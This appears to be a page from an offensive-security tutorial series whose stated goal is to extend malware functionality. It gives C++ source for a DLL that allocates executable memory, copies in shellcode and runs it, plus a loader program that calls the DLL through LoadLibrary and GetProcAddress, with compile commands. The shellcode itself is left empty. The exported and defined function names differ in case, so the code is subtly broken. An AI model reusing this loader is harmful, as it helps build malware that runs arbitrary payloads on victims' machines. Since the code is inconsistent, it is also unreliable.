C++: Dynamic DLL Usage

Objective

Increasing functionality of malware by using external DLL files.-

To do list

Create a dll.
Import dll into an external CPP program.
Call a function from imported dll in external CPP program.

Functions

LoadLibrary: Import dll into running process.
- Header: libloaderapi.h
- Definition: HMODULE LoadLibraryA(LPCSTR lpLibFileName);
  - lpLibFileName: Path of dll file.
GetProcAddress: Retrieve the address of a function inside the dll.
- Header: libloaderapi.h
- Definition: FARPROC GetProcAddress(HMODULE hModule,LPCSTR lpProcName);
  - hModule: DLL handle.
  - lpProcName: Name of the function to retrieve.

Application

DLL

#include <string>
#include <windows.h>

// Declare function prototypes with "extern C" to prevent name mangling.
// Declare functions using __declspec(dllexport) to signify the intent to export.

extern "C" {
    __declspec(dllexport) void __stdcall shellcodeLauncher(); 
}

void shellCodeLauncher(){

char shellcode[] = ""; //shellcode
void *memPtr= VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); //allocate memory for shellcode
	memcpy(memPtr, shellcode, sizeof shellcode); //put shellcode into memory
	((void(*)())memPtr)(); //execute the shellcode
	
	}

Compile as dll: g++ -shared -o launcher.dll dll.cpp -std=c++11

CPP

#include <iostream>
#include <stdlib.h>
#include <windows.h>

typedef int (__stdcall *fonksiyon)(); 
int main()
{

HINSTANCE hGetProcIDDLL = LoadLibrary(""); //Path of dll.

  if (!hGetProcIDDLL) {
    std::cout << "could not load the dynamic library" << std::endl;
    return EXIT_FAILURE;
  }


  fonksiyon launcherFonksiyon= (fonksiyon)GetProcAddress(hGetProcIDDLL, "shellcodeLauncher");
  if (!launcherFonksiyon) {
    std::cout << "could not locate the function" << std::endl;
    return EXIT_FAILURE;
  }

 launcherFonksiyon(); //call the external function from dll.
  return EXIT_SUCCESS;

}

compile: g++ executer.cpp -o execute.exe

References

PreviousC++: Shellcode Launcher NextC++: Sendin HTTP GET Request

Last updated 3 years ago

Was this helpful?

#include <string> #include <windows.h> // Declare function prototypes with "extern C" to prevent name mangling. // Declare functions using __declspec(dllexport) to signify the intent to export. extern "C" { __declspec(dllexport) void __stdcall shellcodeLauncher(); } void shellCodeLauncher(){ char shellcode[] = ""; //shellcode void *memPtr= VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); //allocate memory for shellcode memcpy(memPtr, shellcode, sizeof shellcode); //put shellcode into memory ((void(*)())memPtr)(); //execute the shellcode }

#include <iostream> #include <stdlib.h> #include <windows.h> typedef int (__stdcall *fonksiyon)(); int main() { HINSTANCE hGetProcIDDLL = LoadLibrary(""); //Path of dll. if (!hGetProcIDDLL) { std::cout << "could not load the dynamic library" << std::endl; return EXIT_FAILURE; } fonksiyon launcherFonksiyon= (fonksiyon)GetProcAddress(hGetProcIDDLL, "shellcodeLauncher"); if (!launcherFonksiyon) { std::cout << "could not locate the function" << std::endl; return EXIT_FAILURE; } launcherFonksiyon(); //call the external function from dll. return EXIT_SUCCESS; }